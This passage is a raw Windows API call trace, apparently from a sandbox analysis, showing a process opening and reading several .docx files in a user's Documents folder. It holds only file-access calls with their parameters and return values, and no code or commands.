lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.893] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.894] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.894] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.894] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.895] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.895] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.895] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.896] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.896] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.896] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.896] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.897] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.897] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.897] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.898] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.898] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.898] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.899] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.899] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.899] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.900] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.900] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.900] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x4af, lpOverlapped=0x0) returned 1 [0216.901] ReadFile (in: hFile=0x354, lpBuffer=0x24fb143, nNumberOfBytesToRead=0x351, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fb143*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.901] ReadFile (in: hFile=0x354, lpBuffer=0x24fbd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24fbd00*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.904] CloseHandle (hObject=0x354) returned 1 [0216.904] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0216.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), fInfoLevelId=0x0, lpFileInformation=0x252bf70 | out: lpFileInformation=0x252bf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc)) returned 1 [0216.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.904] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.905] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0216.905] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0216.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc)) returned 1 [0216.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.905] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx", lpFilePart=0x0) returned 0x29 [0216.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.905] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QZJHA 5.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qzjha 5.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.905] GetFileType (hFile=0x354) returned 0x1 [0216.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.906] GetFileType (hFile=0x354) returned 0x1 [0216.906] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.907] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.907] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.908] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.908] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.908] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.909] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.909] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.909] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.910] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.910] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.910] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0xbcc, lpOverlapped=0x0) returned 1 [0216.910] ReadFile (in: hFile=0x354, lpBuffer=0x252c950, nNumberOfBytesToRead=0x34, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252c950*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.911] ReadFile (in: hFile=0x354, lpBuffer=0x252d1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x252d1f0*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.917] CloseHandle (hObject=0x354) returned 1 [0216.917] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0216.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.917] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), fInfoLevelId=0x0, lpFileInformation=0x2551838 | out: lpFileInformation=0x2551838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7)) returned 1 [0216.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.918] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.918] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0216.918] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0216.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.918] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7)) returned 1 [0216.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.918] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx", lpFilePart=0x0) returned 0x34 [0216.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.918] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ssx9X8TqMo7l4y6fOJ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ssx9x8tqmo7l4y6foj.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.919] GetFileType (hFile=0x354) returned 0x1 [0216.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.919] GetFileType (hFile=0x354) returned 0x1 [0216.919] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.920] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.921] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.921] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.921] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.922] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.922] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.922] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.923] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.923] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.924] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.924] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.925] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.925] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.926] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.926] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.926] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.927] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.927] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.927] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.928] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.929] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.929] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.929] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0xbf7, lpOverlapped=0x0) returned 1 [0216.930] ReadFile (in: hFile=0x354, lpBuffer=0x25522f7, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25522f7*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.930] ReadFile (in: hFile=0x354, lpBuffer=0x2552b6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2552b6c*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.933] CloseHandle (hObject=0x354) returned 1 [0216.933] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0216.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.934] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), fInfoLevelId=0x0, lpFileInformation=0x2586c90 | out: lpFileInformation=0x2586c90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8)) returned 1 [0216.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0216.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0216.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 